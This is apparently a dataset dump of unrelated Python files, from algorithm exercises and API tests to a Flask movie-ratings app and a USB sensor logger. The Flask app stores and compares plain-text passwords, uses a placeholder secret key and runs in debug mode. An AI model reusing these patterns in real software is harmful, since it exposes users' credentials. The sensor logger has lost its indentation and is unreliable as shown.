text stringlengths 38 1.54M |
|---|
# Reduce N until it becomes 1.
# N, K <= 100,000, so an O(X lg X) approach is fast enough.
# (Original Korean comments were encoding-damaged; reconstructed in English.)
N, K = map(int, input().rstrip().split())
# My solution
# > Cases where this kind of approach would be needed:
#   1. Division: when there are two or more numbers the value could be divided by
#      (that case cannot happen here)
#   2. Subtraction: when there are two or more numbers that could be subtracted
#
# If each element of d is viewed as a vertex of a graph, and each divide-by-K or
# subtract-1 step as an edge, then finding the minimum path tells us whether
# memoization, recursion, a for-loop, etc. is needed.
# (Original Korean comments were encoding-damaged and some lines had lost their
# leading '#'; reconstructed in English.)
# Memo table: d[n] records how many operations were used to reach n.
# (Not read when producing the answer; kept for compatibility.)
d = [0]*(N + 1)

def rec(n, step=0):
    """Greedily reduce n to 1: divide by K whenever divisible, else subtract 1.

    Returns the total number of operations. `step` is the count accumulated
    so far (kept for interface compatibility with the original recursion).

    BUG FIX: the original tested `N % K == 0` (the module-level constant)
    instead of the current value `n`, so `n // K` could be applied to a
    non-multiple of K. Also rewritten iteratively: with N up to 100,000 and
    one recursive call per subtraction, the original could exceed CPython's
    default recursion limit (~1,000). The unreachable `return -1` is removed.
    """
    global K
    global d
    while n != 1:
        d[n] = step
        if n % K == 0:
            n //= K
        else:
            n -= 1
        step += 1
    d[1] = step
    return step
print(rec(N))
# Book solution
# No memoization/recursion is needed: applying the operations with priority
# "1. divide by K, 2. subtract 1" is guaranteed to yield the optimal answer.
# (Original Korean comment was encoding-damaged; reconstructed in English.)
# Greedy reduction: divide by K whenever possible, otherwise subtract 1,
# counting every operation until N reaches 1.
answer = 0
while N != 1:
    if N % K:
        N -= 1
    else:
        N //= K
    answer += 1
print(answer)
import pandas as pd
import numpy as np
from Classwork import Basic_stats
# Sample salary data (20 observations).
salary = [82, 76, 24, 40, 67, 62, 75, 78, 71, 32,
          98, 89, 78, 67, 72, 82, 87, 66, 56, 52]

# Compute and show the median, then the outliers, using the Classwork helpers.
stats = Basic_stats()
median_value = stats.bs_median(salary)
print(median_value)
print(stats.bs_outliers(salary))
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, exceptions, fields, models, _
from odoo.addons.phone_validation.tools import phone_validation
class MassSMSTest(models.TransientModel):
    """Wizard used to send a test SMS of a mailing to a list of phone numbers."""
    _name = 'mailing.sms.test'
    _description = 'Test SMS Mailing'

    def _default_numbers(self):
        # Pre-fill with the current user's sanitized phone number, if any.
        return self.env.user.partner_id.phone_sanitized or ""

    numbers = fields.Char(string='Number(s)', required=True,
        default=_default_numbers, help='Comma-separated list of phone numbers')
    mailing_id = fields.Many2one('mailing.mailing', string='Mailing', required=True, ondelete='cascade')

    def action_send_sms(self):
        """Render the mailing body against one sample record and send it as a
        test SMS to every valid number; raise on badly-encoded numbers."""
        self.ensure_one()

        raw_numbers = [num.strip() for num in self.numbers.split(',')]
        sanitize_res = phone_validation.phone_sanitize_numbers_w_record(raw_numbers, self.env.user)
        valid_numbers = [info['sanitized'] for info in sanitize_res.values() if info['sanitized']]
        invalid_numbers = [num for num, info in sanitize_res.items() if info['code']]
        if invalid_numbers:
            raise exceptions.UserError(_('Following numbers are not correctly encoded: %s, example : "+32 495 85 85 77, +33 545 55 55 55"', repr(invalid_numbers)))

        # Render against the first record of the target model, if one exists;
        # rendering raises a proper error on a jinja syntax problem.
        record = self.env[self.mailing_id.mailing_model_real].search([], limit=1)
        body = self.mailing_id.body_plaintext
        if record:
            body = self.env['mail.render.mixin']._render_template(body, self.mailing_id.mailing_model_real, record.ids)[record.id]

        self.env['sms.api']._send_sms_batch([{
            'res_id': 0,
            'number': num,
            'content': body,
        } for num in valid_numbers])
        return True
|
from unittest import TestCase, skip
from configparser import ConfigParser
import os
import ticketpy
from ticketpy.client import ApiException
from math import radians, cos, sin, asin, sqrt
def haversine(latlon1, latlon2):
    """
    Calculate the great-circle distance, in miles, between two points on the
    earth given as {'latitude': ..., 'longitude': ...} dicts of decimal
    degrees (values may be strings).

    Adapted from Stack Overflow:
    https://stackoverflow.com/questions/4913349/haversine-formula-in-python-bearing-and-distance-between-two-gps-points
    """
    # convert decimal degrees to radians
    lat1 = radians(float(latlon1['latitude']))
    lon1 = radians(float(latlon1['longitude']))
    lat2 = radians(float(latlon2['latitude']))
    lon2 = radians(float(latlon2['longitude']))
    # haversine formula
    dlon = lon2 - lon1
    dlat = lat2 - lat1
    a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
    c = 2 * asin(sqrt(a))
    # FIX (comment defect): 3956 is the earth's radius in *miles* -- the
    # original comment wrongly said "kilometers". Use 6371 for kilometers.
    r = 3956
    return c * r
def get_client():
    """Returns ApiClient with api key from config.ini"""
    parser = ConfigParser()
    config_path = os.path.join(os.path.dirname(__file__), 'config.ini')
    parser.read(config_path)
    api_key = parser.get('ticketmaster', 'api_key')
    return ticketpy.ApiClient(api_key)
class TestApiClient(TestCase):
    """URL building, API-key handling and link parsing in ApiClient."""

    def setUp(self):
        self.api_client = get_client()

    def test_parse_link(self):
        base_str = "https://app.ticketmaster.com/discovery/v2/events"
        param_str = ("sort=date,asc"
                     "&marketId=10"
                     "&keyword=LCD%20Soundsystem")
        full_url = '{}?{}'.format(base_str, param_str)
        parsed_link = self.api_client._parse_link(full_url)
        self.assertEqual(base_str, parsed_link.url)
        # Parameters should come back URL-decoded, with the API key included.
        params = parsed_link.params
        expected = {
            'sort': 'date,asc',
            'marketId': '10',
            'keyword': 'LCD Soundsystem',
            'apikey': self.api_client.api_key['apikey'],
        }
        for name, value in expected.items():
            self.assertEqual(value, params[name])

    def test_apikey(self):
        tmp_client = ticketpy.ApiClient('random_key')
        self.assertIn('apikey', tmp_client.api_key)
        self.assertEqual('random_key', tmp_client.api_key['apikey'])

    def test_url(self):
        self.assertEqual(self.api_client.url,
                         "https://app.ticketmaster.com/discovery/v2")

    def test_method_url(self):
        # __method_url is name-mangled; reach it explicitly.
        method_url = self.api_client._ApiClient__method_url
        self.assertEqual(
            "https://app.ticketmaster.com/discovery/v2/events.json",
            method_url('events'))

    def test_bad_key(self):
        bad_client = ticketpy.ApiClient('asdf')
        self.assertRaises(ApiException, bad_client.venues.find, keyword="a")

    def test__bad_request(self):
        # Radius should be a whole number, so 1.5 should raise ApiException
        self.assertRaises(ApiException, self.api_client.events.by_location,
                          latitude='33.7838737', longitude='-84.366088',
                          radius='1.5')

    def test___yes_no_only(self):
        yno = self.api_client._ApiClient__yes_no_only
        # Strings are normalized case-insensitively; booleans map to yes/no;
        # anything unrecognized is passed through lowercased.
        cases = [
            ('yes', 'yes'), ('YES', 'yes'), ('Yes', 'yes'), (True, 'yes'),
            ('no', 'no'), ('NO', 'no'), ('No', 'no'), (False, 'no'),
            ('only', 'only'), ('ONLY', 'only'), ('Only', 'only'),
            ('asdf', 'asdf'), ('Asdf', 'asdf'),
        ]
        for given, expected in cases:
            self.assertEqual(yno(given), expected)
class TestVenueQuery(TestCase):
    """Venue search and lookup against the live Discovery API."""

    def setUp(self):
        self.tm = get_client()
        # Known venue IDs used by the lookup tests.
        self.venues = {
            'smithes': 'KovZpZAJledA',
            'tabernacle': 'KovZpaFEZe'
        }

    def test_find(self):
        for venue in self.tm.venues.find(keyword="TABERNACLE").limit(2):
            self.assertIn("TABERNACLE", venue.name.upper())

    def test_by_name(self):
        # Make sure this returns only venues matching search terms...
        search_name = "TABERNACLE"
        for venue in self.tm.venues.by_name(search_name, "GA").limit(2):
            self.assertIn(search_name, venue.name.upper())

    def test_get_venue(self):
        venue = self.tm.venues.by_id(self.venues['tabernacle'])
        self.assertEqual(self.venues['tabernacle'], venue.id)
        self.assertIn('Tabernacle', venue.name)
class TestClassificationQuery(TestCase):
    """Classification / segment / genre / subgenre lookups."""

    def setUp(self):
        self.tm = get_client()

    def test_classification_search(self):
        results = self.tm.classifications.find(keyword="DRAMA").limit()
        self.assertIn('Film', [cl.segment.name for cl in results])
        genre_names = [g.name.upper() for cl in results
                       for g in cl.segment.genres]
        self.assertIn("DRAMA", genre_names)

    def test_classification_by_id(self):
        genre_id = 'KnvZfZ7vAvE'
        nested = self.tm.classifications.by_id(genre_id)
        self.assertIn(genre_id, [g.id for g in nested.segment.genres])

    def test_classification_by_id_404(self):
        self.assertRaises(ApiException, self.tm.classifications.by_id, 'asdf')

    def test_segment_by_id(self):
        seg_id = 'KZFzniwnSyZfZ7v7nJ'
        seg_name = 'Music'
        # Look the ID up twice, as the original test did.
        for seg in (self.tm.segment_by_id(seg_id),
                    self.tm.segment_by_id(seg_id)):
            self.assertEqual(seg_id, seg.id)
            self.assertEqual(seg_name, seg.name)

    def test_genre_by_id(self):
        genre_id = 'KnvZfZ7vAvE'
        genre_name = 'Jazz'
        for genre in (self.tm.genre_by_id(genre_id),
                      self.tm.genre_by_id(genre_id)):
            self.assertEqual(genre_id, genre.id)
            self.assertEqual(genre_name, genre.name)

    def test_subgenre_by_id(self):
        subgenre_id = 'KZazBEonSMnZfZ7vkdl'
        subgenre_name = 'Bebop'
        for subgenre in (self.tm.subgenre_by_id(subgenre_id),
                         self.tm.subgenre_by_id(subgenre_id)):
            self.assertEqual(subgenre_id, subgenre.id)
            self.assertEqual(subgenre_name, subgenre.name)
class TestAttractionQuery(TestCase):
    """Attraction search and lookup."""

    def setUp(self):
        self.tm = get_client()

    def test_attraction_search(self):
        attr_name = "YANKEES"
        attractions = self.tm.attractions.find(keyword=attr_name).limit(1)
        names = [a.name for a in attractions]
        # At least one returned attraction must match the keyword.
        self.assertTrue(any(attr_name in name.upper() for name in names))

    def test_attraction_by_id(self):
        attraction_id = 'K8vZ9171okV'
        attraction_name = 'New York Yankees'
        attraction = self.tm.attractions.by_id(attraction_id)
        self.assertEqual(attraction_id, attraction.id)
        self.assertEqual(attraction_name, attraction.name)
class TestEventQuery(TestCase):
    """Event search by ID, location and venue."""

    def setUp(self):
        self.tm = get_client()

    @skip("Skipping until test update")
    def test_get_event_id(self):
        # TODO search events, then pull a specific ID to use here
        event_id = 'vvG1zZfbJQpVWp'
        event = self.tm.events.by_id(event_id)
        self.assertEqual(event_id, event.id)

    def test_get_event_id_404(self):
        self.assertRaises(ApiException, self.tm.events.by_id, "asdf")

    def test_search_events_by_location(self):
        # Search for events near a point vaguely within Virginia Highlands.
        # The distance between the original coordinates and each returned
        # venue is re-checked with haversine() and only venues within 3 miles
        # are evaluated, because the API can return far-away results if you
        # let it (e.g. sorting by date,asc returns events in Austin...).
        city = 'Atlanta'
        origin = {'latitude': '33.7838737', 'longitude': '-84.366088'}
        events = self.tm.events.by_location(
            latitude=origin['latitude'],
            longitude=origin['longitude'],
            radius=3,
            unit='miles'
        ).limit(3)
        nearby_venues = []
        for event in events:
            for venue in event.venues:
                venue_pos = {'latitude': venue.location['latitude'],
                             'longitude': venue.location['longitude']}
                if haversine(origin, venue_pos) <= 3:
                    nearby_venues.append(venue)
        # Ensure we aren't passing the test on an empty list
        self.assertGreater(len(nearby_venues), 0)
        # Every city in the (populated) list should be Atlanta
        for venue in nearby_venues:
            self.assertEqual(city, venue.city)
            self.assertEqual(city, venue.location['city'])

    def test_search_events(self):
        venue_id = 'KovZpaFEZe'
        venue_name = 'Tabernacle'
        for event in self.tm.events.find(venue_id=venue_id, size=2).limit(4):
            for venue in event.venues:
                with self.subTest(venue_id=venue_id):
                    self.assertEqual(venue_id, venue.id)
                with self.subTest(venue_name=venue_name):
                    self.assertIn(venue_name, venue.name)

    def test_events_get(self):
        genre_name = 'Hip-Hop'
        venue_id = 'KovZpZAJledA'
        venue_name = "Smith's Olde Bar"
        events = self.tm.events.find(
            classification_name=genre_name,
            venue_id=venue_id
        ).limit(2)
        for event in events:
            for venue in event.venues:
                self.assertEqual(venue_id, venue.id)
                self.assertEqual(venue_name, venue.name)
            genres = [ec.genre.name for ec in event.classifications]
            self.assertTrue(any(genre_name in g for g in genres))
class TestPagedResponse(TestCase):
    """Paging behavior: one(), limit() and all()."""

    def setUp(self):
        self.tm = get_client()

    def test_one(self):
        # Generic search returns numerous pages; one() must return a single page.
        events = self.tm.events.find(state_code='GA', size=7).one()
        self.assertEqual(7, len(events))
        venues = self.tm.venues.find(keyword='Tabernacle', size=5).one()
        self.assertEqual(5, len(venues))

    def test_limit(self):
        # API page size default=20, limit(max_pages) default=5
        defaults = self.tm.events.find().limit()
        self.assertEqual(100, len(defaults))
        # Switch up defaults
        custom = self.tm.events.find(state_code='GA', size=8).limit(3)
        self.assertEqual(24, len(custom))

    def test_all(self):
        # Iterate manually and via all(); both traversals must agree, and the
        # number of pages seen must equal total_pages from the first page.
        paged = self.tm.venues.find(keyword="TABERNACLE", size=5)
        auto_ids = [venue.id for venue in paged.all()]
        manual_ids = []
        pages_seen = 0
        total_pages = None
        for page in paged:
            if pages_seen == 0:
                total_pages = page.total_pages
            pages_seen += 1
            manual_ids += [venue.id for venue in page]
        self.assertEqual(pages_seen, total_pages)
        self.assertListEqual(auto_ids, manual_ids)
|
from django.contrib import admin
from .models import Schoola
# Register your models here.
# Expose the Schoola model in the Django admin using the default ModelAdmin.
admin.site.register(Schoola)
"""
judgement.py -- A flask-based ratings list
"""
# Remaining to do: Update a rating, clean up the interface and only allow logged in users to submit a rating
#Added session, url_for, escape for username login and g for global variables
# adding request is accessing the request object and same for redirect
# session/url_for/flash support login state and messaging; request and
# redirect handle form submissions.
from flask import Flask, render_template, request, redirect, url_for, session, flash
# connect to model (SQLAlchemy session + ORM classes)
import model
# initializes program to be a Flask application
app = Flask(__name__)
# A secret key is required to sign the client-side session cookie.
# NOTE(review): "key" is a placeholder secret -- replace with a long random
# value before any real deployment.
app.secret_key = "key"
# initialize application with config; from_object imports the object if it is a string
app.config.from_object(__name__)
@app.route("/index")
def index():
    """Landing route: forwards straight to the user listing.

    FIX: the original read user_id out of the session here but never used
    it; the dead lookup has been removed.
    """
    return redirect(url_for("list_users"))
# Signup form: captures email, password, age and zipcode.
@app.route("/create_user")
def create_user():
    """Render the signup form."""
    return render_template("create_user.html")
# Persist the information entered on the create_user form.
@app.route("/save_user", methods=["POST"])
def save_user():
    """Create a new User row from the signup form, then go back to the index."""
    form = request.form
    new_user = model.User(email=form['email'],
                          password=form['password'],
                          age=form['age'],
                          zipcode=form['zipcode'])
    # Stage and commit the new row.
    model.session.add(new_user)
    model.session.commit()
    return redirect(url_for("index"))
# Login form (GET only; credentials are posted to /authenticate).
@app.route("/login", methods=['GET'])
def login():
    """Render the login form."""
    return render_template("login.html")
# Credential check for the login form.
@app.route("/authenticate", methods=["POST"])
def authenticate():
    """Validate the submitted credentials and start a session on success."""
    submitted_email = request.form['email']
    submitted_password = request.form['password']
    # NOTE(review): passwords are compared in plain text against the DB --
    # presumably acceptable for this learning project; confirm before any
    # production use.
    user_info = model.session.query(model.User).filter_by(
        email=submitted_email, password=submitted_password).first()
    if not user_info:
        # Bad credentials: flash an error and return to the login form.
        flash('Invalid username or password', 'error')
        return redirect(url_for('login'))
    # Record the login in the session and land on the user's ratings page.
    session['email'] = user_info.email
    session['user_id'] = user_info.id
    flash('Logged in as:' + submitted_email)
    return redirect(url_for('user_ratings', id=user_info.id))
# End the user's session.
@app.route("/logout")
def logout():
    """Clear the login state and return to the index."""
    for key in ('email', 'user_id'):
        session.pop(key, None)
    return redirect(url_for('index'))
# List users. The id can be passed through the view/function or read from
# the session.
@app.route("/list_users")
def list_users():
    """Show (up to) the first five users, plus the current login state."""
    current_email = session.get('email', None)
    users = model.session.query(model.User).limit(5).all()
    return render_template("list_users.html", user_list=users, user_email=current_email)
# Clicking a user shows the movies they've rated, with the ratings.
@app.route("/user_ratings/<int:id>")
def user_ratings(id=None):
    """Render the ratings page for the user with the given id."""
    # id=None guards against a missing id in the route.
    if session.get('email', None):
        flash('Click movie link to review ratings.', 'message')
    else:
        flash('Login to update ratings.', 'warning')
    # Load the user (and, via the ORM relationship, their ratings).
    user = model.session.query(model.User).get(id)
    return render_template("user_ratings.html", user=user)
# View all ratings for a specific movie; <int:id> ensures id is an int.
@app.route("/movie_ratings/<int:id>", methods=["GET"])
def movie_ratings(id=None):
    """Show a movie's ratings page.

    A logged-in user who already rated the movie sees their rating; a
    logged-in user who has not sees a predicted rating; an anonymous
    visitor just sees the movie.
    """
    user_id = session.get('user_id', None)
    # Load the movie and (if logged in) any existing rating by this user.
    movie = model.session.query(model.Movie).get(id)
    user_rating_query = model.session.query(model.Rating).filter_by(user_id=user_id, movie_id=id).first()
    if user_rating_query:
        flash('You\'ve rated this movie as follows:' + str(user_rating_query.rating))
        return render_template("movie_ratings.html", movie=movie, rating=user_rating_query)
    flash('Do you want to rate this movie?', 'message')
    # BUG FIX: the original unconditionally loaded the user and called
    # predict_rating, which crashed with AttributeError for anonymous
    # visitors (user_id None -> query.get(None) returns None).
    if user_id is None:
        return render_template("movie_ratings.html", movie=movie, prediction=None)
    user = model.session.query(model.User).get(user_id)
    prediction = user.predict_rating(movie)
    return render_template("movie_ratings.html", movie=movie, prediction=prediction)
# When logged in and viewing a movie, add -- or update -- a personal rating.
@app.route('/rate_movie/<int:id>', methods=['POST'])
def rate_movie(id):
    """Add or update the logged-in user's rating for movie `id`.

    FIX: addresses the file-level TODO ("Update a rating") -- the original
    always inserted a new Rating row, producing duplicates when a user
    re-rated the same movie.
    """
    user_id = session['user_id']
    rating_value = int(request.form['rating_select'])
    existing = model.session.query(model.Rating).filter_by(user_id=user_id, movie_id=id).first()
    if existing:
        existing.rating = rating_value
        flash("You've updated your rating")
    else:
        model.session.add(model.Rating(user_id=user_id, movie_id=id, rating=rating_value))
        flash("You've added a rating")
    model.session.commit()
    return redirect(url_for('user_ratings', id=user_id))
# Display the (empty) search form.
@app.route("/search", methods=["GET"])
def display_search():
    """Render the search page."""
    return render_template("search.html")
# Handle a submitted movie search.
@app.route("/search", methods=["POST"])
def search():
    """Case-insensitive substring search on movie titles, capped at 20 hits."""
    term = request.form['query']
    pattern = "%" + term + "%"
    movies = model.session.query(model.Movie).filter(model.Movie.title.ilike(pattern)).limit(20).all()
    return render_template('results.html', movies=movies)
# Given a user U who has not rated movie X, find all other users who have rated that movie
# For each other user O, find the movies they have rated in common with user U
# Pair up the common movies, then feed each pair list into the pearson function to find similarity S
# Rank the users by their similarities and find the user with the highest similarity, O
# Multiply the similarity coefficient of user O with their rating for movie X - this is the prediction
if __name__ == "__main__":
    # Debug mode shows an in-browser traceback/debugger. Never enable it on
    # a production system -- it lets users execute code on the server.
    app.run(debug=True)
import numpy as np
import time
import thread
import rospy
from std_msgs.msg import Float32MultiArray
def input_thread(a_list):
    """Block until the user presses enter, then flag the main loop to stop."""
    raw_input()
    a_list.append(True)
if __name__ == "__main__":
    pub = rospy.Publisher("/sim/move", Float32MultiArray, queue_size=10)
    rospy.init_node("move")

    # Wheel command vectors; signs are as seen from the top view.
    forwards = [1, 1, 1, 1, 0, 0, 0, 0]
    backwards = [-1, -1, -1, -1, 0, 0, 0, 0]
    right = [-1, 1, 1, -1, 0, 0, 0, 0]
    left = [1, -1, -1, 1, 0, 0, 0, 0]
    directions = [forwards, right, backwards, left]

    cycle_start = time.time()
    direction_index = 0
    stop_flag = []
    # Background reader: appending to stop_flag ends the publish loop.
    thread.start_new_thread(input_thread, (stop_flag,))
    print("Started sending. Press enter to kill.")

    # Continuously publish the current direction, rotating to the next one
    # every 5 seconds, until the input thread sets the flag.
    while not stop_flag:
        msg = Float32MultiArray()
        if time.time() - cycle_start > 5:
            direction_index = (direction_index + 1) % 4
            cycle_start = time.time()
        msg.data = directions[direction_index]
        pub.publish(msg)

    # Send an all-zero command so the robot stops on exit.
    msg = Float32MultiArray()
    msg.data = [0, 0, 0, 0, 0, 0, 0, 0]
    pub.publish(msg)
|
import sys
import usb
import time
import struct
import array
import math
class DeviceDescriptor(object):
    """Identifies a USB device by vendor/product id plus an interface index."""

    def __init__(self, vendor_id, product_id, interface_id):
        self.vendor_id = vendor_id
        self.product_id = product_id
        self.interface_id = interface_id

    def getDevice(self):
        """
        Return the device corresponding to the device descriptor if it is
        available on a USB bus. Otherwise, return None. Note that the
        returned device has yet to be claimed or opened.
        """
        for bus in usb.busses():
            for device in bus.devices:
                if (device.idVendor == self.vendor_id
                        and device.idProduct == self.product_id):
                    return device
        return None
class PlugUSBDevice(object):
    """Thin wrapper around the Plug's USB bulk endpoints."""
    PLUG_VENDOR_ID = 0x03EB
    PLUG_PRODUCT_ID = 0x6124
    PLUG_INTERFACE_ID = 0
    PLUG_BULK_IN_EP = 2
    PLUG_BULK_OUT_EP = 1

    def __init__(self):
        self.device_descriptor = DeviceDescriptor(PlugUSBDevice.PLUG_VENDOR_ID,
                                                  PlugUSBDevice.PLUG_PRODUCT_ID,
                                                  PlugUSBDevice.PLUG_INTERFACE_ID)
        self.device = self.device_descriptor.getDevice()
        self.handle = None

    def open(self):
        """Look the device up again, open it and claim its interface."""
        self.device = self.device_descriptor.getDevice()
        self.handle = self.device.open()
        if sys.platform == 'darwin':
            # XXX : For some reason, Mac OS X doesn't set the
            # configuration automatically like Linux does.
            self.handle.setConfiguration(1)
        self.handle.claimInterface(self.device_descriptor.interface_id)

    def close(self):
        """Release the claimed interface."""
        self.handle.releaseInterface()

    def getDataPacket(self, bytesToGet):
        """
        Assume bytesToGet is two bytes wide.
        """
        # Request: a zero byte followed by bytesToGet as little-endian u16.
        request = chr(0) + chr(bytesToGet & 0xFF) + chr(bytesToGet >> 8)
        self.handle.bulkWrite(PlugUSBDevice.PLUG_BULK_OUT_EP, request, 200)
        # XXX : Gah! Returns a tuple of longs. Why doesn't it return
        # a string?
        return self.handle.bulkRead(PlugUSBDevice.PLUG_BULK_IN_EP,
                                    bytesToGet,
                                    200)
class PlugSensors(object) :
def __init__(self,
bytesPerDataPacket=64,
bitsPerSample=10,
channelsPerScan=8,
scansPerDataPacket=6) :
# Number of bytes the Plug returns in a sensors data packet.
self.bytesPerDataPacket = bytesPerDataPacket
# Resolution at which ADC samples inputs.
self.bitsPerSample = bitsPerSample
# Number of ADC channels sampled in a single pass.
self.channelsPerScan = channelsPerScan
# Number of times all ADC channels are sampled per packet.
self.scansPerDataPacket = scansPerDataPacket
# Needed to convert from signed longs to string.
self.__unpack_format__ = 'B'*self.bytesPerDataPacket
# Needed to convert from string to unsigned bytes.
self.__pack_format__ = 'b'*self.bytesPerDataPacket
# Information not generated by ADC.
self.numADCBytes = self.bitsPerSample*self.channelsPerScan*self.scansPerDataPacket/8
self.skippedSamplesIndex = self.bitsPerSample*self.channelsPerScan*self.scansPerDataPacket/8
self.bytesUsedIndex = self.skippedSamplesIndex + 1
self.vibrationIndex = self.skippedSamplesIndex + 2
assert self.bytesPerDataPacket*8 >= self.bitsPerSample*self.channelsPerScan*self.scansPerDataPacket
self.plug = PlugUSBDevice()
self.plug.open()
def logSamplesToFile(self, filename) :
f = file(filename, 'w')
print "To stop data collection, type <CTRL> + c."
startTime = time.time()
f.write("# Plug data log. Data format is:\n#\n")
f.write("# current time in seconds\n")
f.write("# scans recorded between the last time and the current time\n")
f.write("# scans skipped between the last time and the current time\n")
f.write("# light samples\n")
f.write("# sound samples\n")
f.write("# vibration samples\n")
f.write("# voltage samples\n")
f.write("# current1 samples\n")
f.write("# current2 samples\n")
f.write("# current3 samples\n")
f.write("# current4 samples\n")
f.write("# expansion samples\n")
while True :
try :
data = self.getSamples()
format_string = ("%d\t"*(data['scans_recorded']-1) + "%d\n")
f.write("\n%f\n" % data['time'])
f.write("%d\n" % data['scans_recorded'])
f.write("%d\n" % data['scans_skipped'])
f.write(format_string % tuple(data['light']))
f.write(format_string % tuple(data['sound']))
f.write(format_string % tuple(data['vibration']))
f.write(format_string % tuple(data['voltage']))
f.write(format_string % tuple(data['current1']))
f.write(format_string % tuple(data['current2']))
f.write(format_string % tuple(data['current3']))
f.write(format_string % tuple(data['current4']))
f.write(format_string % tuple(data['expansion']))
except KeyboardInterrupt :
print "You have successfully logged data."
f.close()
return
def parseSamplesFromFile(self, filename) :
# Store sensor data in arrays of unsigned shorts (minimum of
# two bytes).
sensors = [array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H'),
array.array('H')]
# Store time data in an array of floats (minimum of 8 bytes).
seconds = array.array('d')
# Open the log file.
f = file(filename, 'r')
# Skip over the initial comments.
line = f.readline()
while line != '' and line[0] == "#" :
line = f.readline()
line = f.readline() # Skip blank line.
while line != '' :
time_recorded = float(line)
scans_recorded = int(f.readline())
scans_skipped = int(f.readline())
for i in range(scans_recorded) :
seconds.append(time_recorded)
for i in range(len(sensors)) :
for x in f.readline().split() :
sensors[i].append(int(x))
f.readline() # Skip blank line.
line = f.readline()
return {"seconds" : seconds,
"light" : sensors[0],
"sound" : sensors[1],
"vibration" : sensors[2],
"voltage" : sensors[3],
"current1" : sensors[4],
"current2" : sensors[5],
"current3" : sensors[6],
"current4" : sensors[7],
"expansion" : sensors[8]}
def getSamples(self) :
samples = {}
# Request and wait for a packet.
packet = self.plug.getDataPacket(self.bytesPerDataPacket)
# Convert data from signed to unsigned.
data = struct.unpack(self.__unpack_format__, struct.pack(self.__pack_format__, *packet))
# Get all metadata.
samples['time'] = time.time()
samples['scans_skipped'] = data[self.skippedSamplesIndex]
samples['scans_recorded'] = data[self.bytesUsedIndex]*8/(self.bitsPerSample*self.channelsPerScan)
# Unpack the two bytes of vibratab data.
samples['vibration'] = self.unpackBits(data[self.vibrationIndex:self.vibrationIndex+2], 1)[:samples['scans_recorded']]
# Unpack ADC data.
data = self.unpackBits(data[:self.numADCBytes], 10)
# XXX : This next portion is hard coded.
samples['light'] = [data[i] for i in range(0,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['sound'] = [data[i] for i in range(1,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['voltage'] = [data[i] for i in range(2,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['expansion'] = [data[i] for i in range(3,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current4'] = [data[i] for i in range(4,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current2'] = [data[i] for i in range(5,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current3'] = [data[i] for i in range(6,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
samples['current1'] = [data[i] for i in range(7,samples['scans_recorded']*self.channelsPerScan,self.channelsPerScan)]
return samples
def unpackBits(self, s, bits) :
"""
Unpack a sequence s of bytes into a list of numbers each of bits length.
Assumes numbers are stored in little endian format and represent
unsigned integers.
"""
if (len(s)*8 < bits) :
return []
bitMask = int('1'*bits, 2)
numberOfValues = int(8*len(s)/bits)
currentByte = 0
currentBit = 0
values = []
while len(values) != numberOfValues :
bitsToGet = bits
if currentBit + bitsToGet < 8 :
value = (s[currentByte] >> currentBit) & bitMask
currentBit += bitsToGet
bitsToGet = 0
else :
value = (s[currentByte] >> currentBit)
bitsToGet -= (8 - currentBit)
currentBit = 0
currentByte += 1
for i in range(int(bitsToGet/8)) :
value |= (s[currentByte] << (bits - bitsToGet))
currentByte += 1
bitsToGet -= 8
if bitsToGet :
value |= ((s[currentByte] & int('1'*bitsToGet, 2)) << (bits - bitsToGet))
currentBit = bitsToGet
values.append(value)
return values
def main(argv=None) :
if argv is None :
script_name = sys.argv[0]
argv = sys.argv[1:]
if len(argv) == 1 :
option = argv[0]
filename = "PlugSensors.dat"
elif len(argv) == 2 :
option = argv[0]
filename = argv[1]
else :
option = None
filename = None
if option == 'log' :
s = PlugSensors()
s.logSamplesToFile(filename)
s.plug.close()
elif option == 'parse' :
s = PlugSensors()
return s.parseSamplesFromFile(filename)
elif option == 'sensors' :
s = PlugSensors()
for i in range(10) :
print s.getSamples()
else :
print "Usage: python -i %s OPTION [FILENAME]" % script_name
print " where OPTION can be 'parse' or 'log'"
if __name__ == "__main__" :
data = main()
if type(data) == dict :
print "Parsed data is now availabe in the 'data' dictionary."
print "You can access the arrays of data looking at \"data['light']\", for example."
print "Use 'data.keys()' to list other options."
|
import sys
# Read n, then a 2 x n grid of integers from stdin. Answer: the maximum over
# split points i of (prefix sum of row 0 up to i) + (suffix sum of row 1 from i),
# never less than 0 (matching the original's zero-initialized accumulator).
n = int(sys.stdin.readline())
grid = [[int(v) for v in sys.stdin.readline().split()] for _ in range(2)]

if n == 1:
    print(grid[0][0] + grid[1][0])
else:
    import itertools
    top_prefix = list(itertools.accumulate(grid[0]))
    bottom_suffix = list(reversed(list(itertools.accumulate(reversed(grid[1])))))
    best = 0
    for top_sum, bottom_sum in zip(top_prefix, bottom_suffix):
        best = max(best, top_sum + bottom_sum)
    print(best)
|
import cv2
import pytesseract
import numpy as np
from PIL import ImageGrab
import time
# Point pytesseract at the local Tesseract binary (Windows install path).
pytesseract.pytesseract.tesseract_cmd = 'C:\Program Files (x86)\Tesseract-OCR\\tesseract.exe'

# Load the image, normalize its size, and convert BGR -> RGB for tesseract.
source = cv2.imread('dtu.PNG')
resized = cv2.resize(source, (512, 512))
img = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
hImg, wImg, _ = img.shape

# Word-level OCR: image_to_data returns one TSV row per detected element;
# rows with 12 fields carry a recognized word in the last column
# (fields 6-9 are left, top, width, height).
boxes = pytesseract.image_to_data(img)
for row_index, row in enumerate(boxes.splitlines()):
    print(row)
    if row_index == 0:
        continue  # skip the TSV header row
    fields = row.split()
    if len(fields) == 12:
        x, y, w, h = int(fields[6]), int(fields[7]), int(fields[8]), int(fields[9])
        cv2.putText(img, fields[11], (x, y-2), cv2.FONT_HERSHEY_DUPLEX, 0.5, (0, 0, 255), 1)
